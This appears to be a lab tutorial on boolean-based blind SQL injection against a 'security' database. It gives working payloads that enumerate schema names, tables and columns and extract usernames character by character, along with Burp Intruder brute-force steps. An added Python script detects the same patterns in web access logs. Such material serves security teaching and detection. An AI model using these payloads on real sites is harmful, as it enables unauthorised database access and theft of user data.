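1. Determine how the parameter is closed (quote style)
2. Determine the number of databases
?id=1' and (select count(schema_name) from information_schema.schemata)=N -- - # N is the number of databases (guess starting from 1)
3. Determine the character length of the first database name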
?id=1' and (select length(schema_name) from information_schema.schemata limit 0,1)=18 -- -
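4. Determine each character of each database name by its ASCII code
?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105 -- - # use > and < to narrow down the approximate range
5. Determine the number of tables in the security database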
?id=1' and (select count(table_name) from information_schema.tables where table_schema='security')=4-- -
6. Determine the length of the first table name in the security database
?id=1' and (select length(table_name) from information_schema.tables where table_schema='security' limit 0,1)=6 -- -
7. Determine the ASCII value of the first character of the first table name in the security database
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101 -- -
8. Determine the number of columns in the security.users table
?id=1' and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3-- -
9. Determine the length of the first column name in the security.users table
?id=1' and (select length(column_name) from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)=2 -- -
10. Determine the ASCII value of the first character of the first column name in the security.users table
?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=105 -- -
11. Determine how many rows the security.users table contains
?id=1' and (select count(username) from security.users)=13 -- -
12. Determine the length of the username value in the first row of the users table
?id=1' and (select length(username) from security.users limit 0,1)=4 -- -
13. Determine the ASCII value of the first character of the username value in the first row of the users table
?id=1' and ascii(substr((select username from security.users limit 0,1),1,1))=68-- -
?id=1' and substr(database(),1,1)='s' -- -
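Intercept the request, right-click it and choose Send to Intruder
Click Clear
Select the letter s and click Add
Click Payloads
Add a-z, A-Z, 0-9
Start the brute force
Brute-force results
Brute force succeeded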
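
As an added example (not part of the original page), the script below looks for the request patterns from the steps above in a web server access log, which is how this kind of enumeration shows up on the defending side. The log lines, IP addresses, `/index.php` path and response sizes are constructed, and the function names are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log sample: IPs, path and response sizes are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?id=1 HTTP/1.1" 200 706
192.0.2.77 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=1%27%20and%20(select%20length(schema_name)%20from%20information_schema.schemata%20limit%200,1)=18%20--%20- HTTP/1.1" 200 706
192.0.2.77 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=1%27%20and%20ascii(substr((select%20schema_name%20from%20information_schema.schemata%20limit%200,1),1,1))=104%20--%20- HTTP/1.1" 200 722
192.0.2.77 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=1%27%20and%20ascii(substr((select%20schema_name%20from%20information_schema.schemata%20limit%200,1),1,1))=105%20--%20- HTTP/1.1" 200 706
192.0.2.77 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?id=1%27%20and%20substr(database(),1,1)=%27s%27%20--%20- HTTP/1.1" 200 706
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "GET (\S+) [^"]*" \d{3} (\d+)')

# Fragments of the inference queries in steps 2-13 and the substr(database()) probe.
SIGNATURES = {
    "char_probe": re.compile(r"ascii\s*\(\s*substr(ing)?\s*\(", re.I),
    "substr_compare": re.compile(r"substr(ing)?\s*\(\s*database\s*\(", re.I),
    "length_probe": re.compile(r"select\s+length\s*\(", re.I),
    "count_probe": re.compile(r"select\s+count\s*\(", re.I),
    "schema_access": re.compile(r"information_schema\.", re.I),
}

def classify(url):
    """Return the signature names matching the URL-decoded query string."""
    query = unquote_plus(url.partition("?")[2])
    return {name for name, rx in SIGNATURES.items() if rx.search(query)}

def find_blind_sqli_clients(log_text, min_hits=3):
    """Report clients that sent at least min_hits inference-style requests."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and (tags := classify(m.group(2))):
            hits[m.group(1)].append((tags, int(m.group(3))))
    report = {}
    for ip, events in hits.items():
        if len(events) >= min_hits:
            report[ip] = {
                "requests": len(events),
                "signatures": sorted(set().union(*(t for t, _ in events))),
                # Two alternating sizes suggest a true/false response oracle.
                "response_sizes": sorted({s for _, s in events}),
            }
    return report

if __name__ == "__main__":
    print(find_blind_sqli_clients(SAMPLE_LOG))
```

A single client producing many such requests with only two distinct response sizes matches the true/false page difference that the length and ASCII comparisons depend on.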